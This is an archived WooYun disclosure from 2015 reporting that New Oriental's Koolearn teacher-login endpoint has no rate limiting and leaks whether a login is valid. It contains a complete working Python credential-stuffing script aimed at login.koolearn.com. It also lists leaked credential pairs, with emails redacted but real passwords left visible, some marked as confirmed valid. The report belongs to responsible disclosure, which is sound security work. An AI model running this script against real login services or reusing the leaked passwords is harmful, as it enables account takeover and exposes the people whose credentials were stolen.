乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-29: 细节已通知厂商并且等待厂商处理中 2015-04-30: 厂商已经确认,细节仅向厂商公开 2015-05-10: 细节向核心白帽子及相关领域专家公开 2015-05-20: 细节向普通白帽子公开 2015-05-30: 细节向实习白帽子公开 2015-06-14: 细节向公众公开
rt
地址:
http://115.182.44.211/index.php/site/login
使用koolearn账号体系登录的。虽然是教师登录,但是如果是正确的用户,会返回success。并且该登录没有做任何限制。一个简单的python脚本。email里面是邮箱与密码的组合
#!/usr/bin/env python#-*-coding:utf-8-*-import httplib2import urllib2import urllibimport socketfrom urllib import urlopenfrom string import replace,find,lowerfrom httplib import HTTPExceptionimport timeimport threadpoolimport threadingmutex = threading.Lock()class fuzz(object): def __init__(self,user_pwd,count): self.user_pwd = user_pwd self.good = [] self.count = count self.threadnum = 10 def makePackage(self,euser,epwd): url = 'http://login.koolearn.com/sso/login.do?userName='+euser+'&password='+epwd+'&channel=wangqian&responseType=json&type=jsonp&callback=jQuery18204328589937649667_1430216268449&_=1430226430181' print url print euser print epwd headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36'} try: h = httplib2.Http() res,con = h.request(url,'GET',headers = headers) print con except: pass i = con.find('error') t = [] if i == -1: if mutex.acquire(): self.good.append([euser,epwd]) mutex.release() else: pass def preS(self): base = 0 for each in self.user_pwd: self.makePackage(each[0],each[1][0:-1]) if mutex.acquire(): if len(self.good) != base: self.save() base = len(self.good) mutex.release() def save(self): fp = open('result','w') for each in self.good: fp.writelines(each[0]+' '+each[1]+'\n') fp.close() def gothread(self): #建立进程池 pool = threadpool.ThreadPool(self.threadnum) #两个list合并,直接相加就可以 count = 0 base = 0 for i in range(self.count): print self.user_pwd[i][0]+'----user-----\n' + self.user_pwd[i][1] + '---pass---\n' if mutex.acquire(): if len(self.good) != base: self.save() print 'OK\n' base = len(self.good) mutex.release() pool.add_task(self.makePackage,self.user_pwd[i][0],self.user_pwd[i][1]) #join and destroy all threads pool.destroy() if __name__=='__main__': f = open('email','r') up = [] count = 0 while True: line = f.readline() if line: i = line.find(' ') user = line[0:i] pwd = line[i+1:] up.append([user,pwd]) count = count + 1 else: break f.close() test = fuzz(up,count) test.preS()
撞库:
[email protected] fantacy2[email protected] caijun[email protected] lh1112[email protected] 781120[email protected] 888999[email protected] 751027[email protected] 6y1x3ca[email protected] flying123[email protected] chudird[email protected] 556575[email protected] jasmine8[email protected] zhugh[email protected] sysop123lxy@yytvu .net 58328[email protected] iamjohns[email protected] hello[email protected] 0531fair[email protected] lgd73.......
[email protected] fantacy2
[email protected] caijun
[email protected] 888999
[email protected] hello
防撞库
危害等级:中
漏洞Rank:5
确认时间:2015-04-30 17:26
感谢支持新东方安全,谢谢。
暂无